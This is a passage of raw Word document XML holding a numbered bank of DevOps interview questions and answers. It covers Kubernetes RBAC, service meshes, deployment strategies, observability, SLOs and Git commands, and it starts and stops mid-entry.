        <w:t xml:space="preserve">      1. User/Pod makes a request to API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. kube-apiserver checks authentication</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. RBAC system checks authorization:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Is this user allowed?</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. If yes → request allowed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. If no → request denied</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key RBAC concepts</w:t>
        <w:br/>
        <w:t>Verbs (actions)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * get</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * list</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * create</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * update</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * delete</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * watch</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * secrets</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>You want a pod to only read pods:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Create Role → pod-reader</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Create RoleBinding → attach to ServiceAccount</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod can list pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cannot delete or modify anything</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RBAC vs ABAC (old system)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RBAC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ABAC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Based on</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Roles</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Attributes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complex</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Standard</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deprecated</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of RBAC like a building:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Roles = job positions (admin, developer, viewer)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Permissions = what each job can access</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * RoleBinding = assigning a badge to a person</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use least privilege</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid giving cluster-admin unless necessary</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use Service Accounts for apps</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Separate roles per namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Regularly audit permissions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>RBAC in Kubernetes is a security model that regulates access to cluster resources by assigning permissions to roles and binding them to users, groups, or service accounts, ensuring controlled and least-privilege access to the Kubernetes API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1690. What is the difference between a Role and a ClusterRole in Kubernetes RBAC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1691. What is the difference between a RoleBinding and a ClusterRoleBinding in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1692. What is GKE Workload Identity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1693. What is the difference between a stateful and a stateless application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1694. What is a secret (in the context of Kubernetes or cloud platforms)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A secret is a piece of sensitive data - passwords, API keys, TLS certificates, tokens - stored and transmitted separately from application code/config, typically encrypted at rest and access-controlled, rather than hardcoded or committed to source control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1695. What is autoscaling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Autoscaling automatically adjusts the number of running instances or Pods up or down based on real-time metrics like CPU, memory, or request rate, so capacity matches actual demand without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1696. What is the difference between horizontal and vertical scaling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1697. What is a reverse proxy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A reverse proxy sits in front of backend servers and forwards client requests to them, commonly used for load balancing, TLS termination, caching, and hiding backend topology from clients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1698. What is TLS/SSL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: TLS (the successor to SSL) is a cryptographic protocol that encrypts data in transit between a client and server and verifies server identity via certificates, which is what makes HTTPS secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1699. What is a container registry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A container registry is a storage and distribution service for container images (like Docker Hub, Artifact Registry, or ECR) where images are pushed after a build and pulled from when deploying.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1700. What is Artifact Registry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1701. What is Cloud Build, and what does a typical Cloud Build workflow look like?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1702. What is Cloud Deploy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1703. How does Cloud Armor work to protect a service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1704. What is a rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A rollback reverts a deployment to its previous known-good version after a bad release, typically by redeploying the prior image/version or, in Kubernetes, using the Deployment's revision history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1705. What is a blue-green deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Blue-green deployment runs two identical production environments (blue = current, green = new); traffic is switched all at once from blue to green after the new version is verified, allowing an instant rollback by switching traffic back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1706. What is a canary deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A canary deployment gradually shifts a small percentage of production traffic to a new version first, monitoring for errors before progressively increasing traffic, limiting the blast radius of a bad release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1707. What is a service mesh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A service mesh is an infrastructure layer that manages communication between microservices inside a cluster, handling things like traffic routing, security, and observability without changing application code—especially in systems like Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A service mesh controls how services talk to each other, not what the services do.</w:t>
        <w:br/>
        <w:t>It adds a dedicated network layer for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service-to-service communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic control</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why service mesh is needed</w:t>
        <w:br/>
        <w:t>In microservices architectures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dozens or hundreds of services communicate</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Each service needs retries, logging, security, metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Adding this logic in every app is complex and error-prone</w:t>
        <w:br/>
        <w:t>Service mesh solves this by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Moving networking logic out of application code</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Managing it centrally at infrastructure level</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (high level)</w:t>
        <w:br/>
        <w:t>A service mesh introduces two main components:</w:t>
        <w:br/>
        <w:t>1. Data plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs next to each service (often as a sidecar container)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: Envoy proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles actual traffic between services</w:t>
        <w:br/>
        <w:t>2. Control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configures and manages the proxies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Defines policies (routing, security, telemetry)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow</w:t>
        <w:br/>
        <w:t>Service A → Sidecar Proxy → Sidecar Proxy → Service B</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t>1. Traffic management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic splitting (canary deployments)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Circuit breaking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retries and timeouts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * mTLS (mutual TLS) encryption</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service identity authentication</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Zero-trust networking</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Metrics (latency, errors, throughput)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributed tracing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Logs between services</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular service mesh tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Linkerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Consul Connect</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS App Mesh</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Service mesh vs Kubernetes networking</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes (basic)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service Mesh</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traffic control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic service routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Advanced (retries, canary, A/B testing)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>mTLS, identity-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Observability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic logs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full tracing + metrics</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a city:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services = buildings</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes networking = roads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service mesh = traffic control system with police, signals, and cameras managing all movement</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use service mesh</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large microservices architectures</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Need for advanced traffic control</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strong security requirements (zero trust)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Complex observability needs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Downsides</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Added complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Performance overhead (extra proxy layer)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Operational learning curve</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A service mesh is an infrastructure layer that manages service-to-service communication in microservices architectures, providing features like traffic routing, security (mTLS), load balancing, and observability through sidecar proxies and a centralized control plane without requiring changes to application code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1708. How does Istio work as a service mesh - what is the basic request/traffic flow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1709. What is observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Observability is the ability to understand a system’s internal state from external signals such as logs, metrics, traces, and events. It helps teams debug unknown issues, not just monitor known failures.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>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Q1710. What is the difference between SLA, SLI, and SLO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1711. What is an error budget?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An error budget is the allowed amount of unreliability (100% minus the SLO) a service can spend before teams must pause feature releases and prioritize reliability work instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1712. What is a runbook?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A runbook is a documented, step-by-step procedure for diagnosing and resolving a specific operational issue, used during incidents so response doesn't depend on one person's memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1713. What is version control?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Version control is a system (like Git) that tracks changes to files over time, letting multiple people collaborate, review history, branch, and revert changes safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1714. What is a Git branch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Git branch is an independent line of development - a movable pointer to a commit - that lets you work on changes in isolation from the main codebase until they're ready to merge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1715. What is a Git merge conflict?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A merge conflict happens when Git can't automatically reconcile changes because two branches modified the same lines of a file differently, requiring a human to manually choose or combine the correct result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1716. What is git stash?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: git stash temporarily saves your uncommitted changes (staged and unstaged) onto a stack and reverts your working directory to a clean state, so you can switch branches or pull updates and later reapply those changes with git stash pop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1717. What is the difference between git fetch and git pull?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1718. What is git cherry-pick used for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: git cherry-pick applies a specific commit from one branch onto another branch without merging the entire branch history, useful for porting a single bug fix to a release branch without pulling in unrelated changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1719. What is git squash?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Squashing combines multiple sequential commits into a single commit (typically via interactive rebase, git rebase -i), used to clean up a messy work-in-progress history into one meaningful commit before merging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1720. What is Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Jenkins is a widely-used open-source, self-hosted automation server for building CI/CD pipelines - it runs builds, tests, and deployments based on triggers (commits, schedules, webhooks), extended through a large plugin ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1721. What is Puppet, and how does it compare to Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1722. What is the difference between HTTP and HTTPS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HTTP transmits data in plain text between client and server; HTTPS is HTTP layered over TLS/SSL, which encrypts that traffic and verifies the server's identity via a certificate, protecting against eavesdropping and man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1723. What is a REST API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
